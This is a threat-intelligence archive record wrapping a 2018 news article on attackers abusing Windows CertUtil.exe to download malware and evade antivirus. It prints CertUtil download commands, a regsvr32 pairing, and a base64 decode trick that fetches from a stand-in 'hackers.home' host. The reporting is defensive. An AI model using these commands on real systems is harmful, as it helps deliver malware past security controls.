{
	"id": "09c31e71-5ba5-412d-af15-a84c0e272a5d",
	"created_at": "2026-04-06T00:13:58.783564Z",
	"updated_at": "2026-04-10T13:12:51.960402Z",
	"deleted_at": null,
	"sha1_hash": "2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b",
	"title": "CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 774756,
	"plain_text": "CertUtil.exe Could Allow Attackers To Download Malware While\r\nBypassing AV\r\nBy Lawrence Abrams\r\nPublished: 2018-04-04 · Archived: 2026-04-05 16:11:01 UTC\r\nWindows has a built-in program called CertUtil, which can  be used to manage certificates in Windows. Using this program\r\nyou can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in\r\nWindows.\r\nOne of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL\r\nand save it as a local file using the syntax \"certutil.exe -urlcache -split -f [URL] output.file\".\r\nSecurity researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware.\r\nhttps://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/\r\nPage 1 of 4\n\nhttps://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/\r\nPage 2 of 4\n\nVisit Advertiser websiteGO TO PAGE\r\ncertutil -urlcache -split -f [serverURL] file.blah\r\nregsvr32.exe /s /u /I:file.blah scrub.dll\r\nMakes a nice pairing.\r\nSmith's concerns were warranted as attackers have been utilizing CertUtil to download malware for quite a while. This\r\nsample utilized it in 2016 and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to\r\nan infected computer.\r\nCertUtil being used in a recent Trojan\r\nYou may be wondering why attackers would use CertUtil when they already have a foothold on a computer?  This is\r\nbecause some computers may be locked down so that unknown applications are unable to download programs.  By using a\r\nbuilt-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus\r\nbe allowed to download files.\r\nThis utilization of legitimate Windows programs to download and execute malware is not unusual as Windows regsvr32.exe\r\nexecutable can be used in a similar manner.\r\nUsing CertUtil+Base64 to Bypass Security Software\r\nToday security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil\r\nthat may make it easier for attacker's downloads to remain undetected by edge security devices. This is to first\r\nbase64 encode the malicious file so it appears as harmless text and then decode it after it has been downloaded using\r\nCertUtil.exe.\r\nAs already discussed, you can download a file using CertUtil.exe by using the following command:\r\ncertutil.exe -urlcache -split -f [URL]output.file\r\nThis will download the file in its original form and save it to the computer. The problem with this method is that network\r\nsecurity devices can detect the file as malicious and block it.\r\nTo get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just\r\nappears as harmless text. Then once the text file is downloaded, the \"certutil.exe -decode\"  command can be used to decode\r\nthe base64 encoded file into the executable.\r\nThis is illustrated in Mertens' handler diary.\r\nC:\\Temp\u003ecertutil.exe -urlcache -split -f \"https://hackers.home/badcontent.txt\" bad.txt\r\nC:\\Temp\u003ecertutil.exe -decode bad.txt bad.exe\r\nThis method potentially gets it past an edge device without being detected and then be converted back into the executable on\r\nthe local machine where it may not be as secure.\r\nWhile, I had not known of this actually being used in the wild, MalwareHunterTeam told me that the use of certutil.exe -\r\ndecode is already being used. Examples can be seen in these samples. In addition, post-publication, we also discovered this\r\nhttps://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/\r\nPage 3 of 4\n\nwrite-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows.\r\nFurthermore, Kaspersky security researcher Fabio Assolini alerted us that this method has been used by Brazilian coders for\r\nsome time.\r\nBrazilian coders are already abusing this tool for some time, using to install more malware...\r\n— Fabio Assolini (@assolini) April 4, 2018\r\nAs you can see, new tricks are thought up every day utilizing what would normally be safe and legitimate Windows\r\nprograms. For those who are not using CertUtil to access remote certificates or servers, you may want to lock down its\r\nability to connect to the Internet.\r\nUpdate 4/4/18 15:13 EST: Updated to include more information about this method being used in the wild.\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/\r\nhttps://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/"
	],
	"report_names": [
		"certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434438,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b.pdf",
		"text": "https://archive.orkl.eu/2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b.txt",
		"img": "https://archive.orkl.eu/2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b.jpg"
	}
}